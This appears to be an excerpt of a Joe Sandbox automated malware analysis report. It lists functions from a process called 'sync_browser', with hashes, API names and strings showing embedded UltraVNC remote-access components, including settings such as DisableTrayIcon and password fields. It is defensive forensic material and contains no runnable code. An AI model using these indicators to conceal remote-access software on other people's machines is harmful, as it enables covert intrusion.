                                                                      • Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                      • Instruction ID: 70f5730fd70ca2a6e7b193d3e08dd319707b03a852fe8f25af2a8d5d8aa51fe6
                                                                      • Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
                                                                      • Instruction Fuzzy Hash: 3A119A25A18A4982EB64AB35F851339B390FF88F95F404136EA4DC7794EF3CD400C715
                                                                      Function 00007FF7E5127978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _callnewh_errno$AllocHeapmalloc
                                                                      • String ID: bad allocation
                                                                      • API String ID: 3727741168-2104205924
                                                                      • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                      • Instruction ID: 598a9005047deb3e8eab6d9b418de1b8cf4238ed9a21d8b69f85d06d0694c873
                                                                      • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                      • Instruction Fuzzy Hash: 16012A69A4878FD1EA10BB10B4702BAA351BF44B90FD41137D94DC66AAEF3CE105D723
                                                                      Function 00007FF7E50DA290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FindMessagePostWindow
                                                                      • String ID: WinVNC Tray Icon
                                                                      • API String ID: 2578315405-1071638575
                                                                      • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                      • Instruction ID: d91081af20975e04cb310d75cc2874ea9096e7136922ceba047c631b3865b748
                                                                      • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                      • Instruction Fuzzy Hash: D2014432E18A4582EB649B16F450369A350FB88FC4F885036FE5E93B59DF3CD4918B15
                                                                      Function 00007FF7E50DCC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: closesocketshutdown
                                                                      • String ID: vsocket.cpp : closing socket
                                                                      • API String ID: 572888783-2569437896
                                                                      • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                      • Instruction ID: 0675182382a8359191c6c607fbd0d58c7d7fe407c32e9aa6b79e9ba3aeeebb33
                                                                      • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                      • Instruction Fuzzy Hash: 90F04F75610B4983EB24AF70D4643B87320FF84F15F605636DA2D862D9DF38C455C362
                                                                      Function 00007FF7E50DDD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: selectsend
                                                                      • String ID:
                                                                      • API String ID: 2999949978-0
                                                                      • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                      • Instruction ID: df7cbba1f50e2ce5459cd9d06256db5febad60dd418d495735ba113c868417b1
                                                                      • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                      • Instruction Fuzzy Hash: 5B312923A18A8A47EA706F25B8647B6E390FF85F59F841132FD4D83A54DF3ED8018721
                                                                      Function 00007FF7E5139234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocHeap_callnewh_errno
                                                                      • String ID:
                                                                      • API String ID: 849339952-0
                                                                      • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                      • Instruction ID: 3cd3917b1f309cb7fe38012d8c6786d28f4dd7a5d528e0f692f5331715611e95
                                                                      • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                      • Instruction Fuzzy Hash: 33118611B0DA4A81FE557F51B674778F2D19F44FA0F894632C91D86ACCDE7CA4408662
                                                                      Function 00007FF7E5084140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeLibraryMessageSend
                                                                      • String ID:
                                                                      • API String ID: 3583424976-0
                                                                      • Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                      • Instruction ID: 443c1ce0d1c28eb6e880eccc6cd3c3eb2ff1895d87efc868216599975c14abd6
                                                                      • Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
                                                                      • Instruction Fuzzy Hash: ED111C29F0A64995FE59FBB1A471B799350DF94F58F880532DD0E86A498E3CF440D322
                                                                      Function 00007FF7E50DCBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: closesocketsetsockoptshutdownsocket
                                                                      • String ID:
                                                                      • API String ID: 3513852771-0
                                                                      • Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                      • Instruction ID: acc562e9df2b76ea44fe2db2423db3f7e757c70217171ec2ec4183375e6cc3d1
                                                                      • Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
                                                                      • Instruction Fuzzy Hash: 7AF0C2B2A1820B87EB60AF34D8213B5A350BF40B14F540636EB19C62D4EB7ED1858B11
                                                                      Function 00007FF7E50DD170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                      • Instruction ID: 5a391608d77334254a758ef01733d48d5a7849293f4fb9a1146302fcfe9e96f9
                                                                      • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                      • Instruction Fuzzy Hash: B4F0FC7561414653E731DF70E404375E350FF84B15F540A32DAACCAAD4DBBCC1998B10
                                                                      Function 00007FF7E50DD1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CountTickselect
                                                                      • String ID:
                                                                      • API String ID: 2475007269-0
                                                                      • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                      • Instruction ID: f2bfcbce57041e812ac80d3764c2786af938b4d05fa585e37cee16694b4cff2f
                                                                      • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                      • Instruction Fuzzy Hash: FF31AE7760464587EB04AF21E5A42ADB762EB88F84F49803ADF098B789DF38D4458B60
                                                                      Function 00007FF7E51332EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 1068366078-0
                                                                      • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                      • Instruction ID: 71bbf272e1433333b6facc21364095046967a39cb2d8c789001c277813489dea
                                                                      • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                      • Instruction Fuzzy Hash: 1C01F722A14A8985EB54AF17A46012DF7A0E784FD0F894032DE5D43794CF3CE851C705

                                                                      Non-executed Functions

                                                                      Function 00007FF7E50781AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                      • API String ID: 634683900-3478490838
                                                                      • Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                      • Instruction ID: 143d22988c2d1ae8b32df100507fc92a057b6131858a9b1eb46837710a979741
                                                                      • Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                                      • Instruction Fuzzy Hash: D8E29A75608A4FD5EB20AF64F8646E4A721FB44B98FC05033D50D8756CEE7CE60AC7A2
                                                                      Function 00007FF7E507E1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
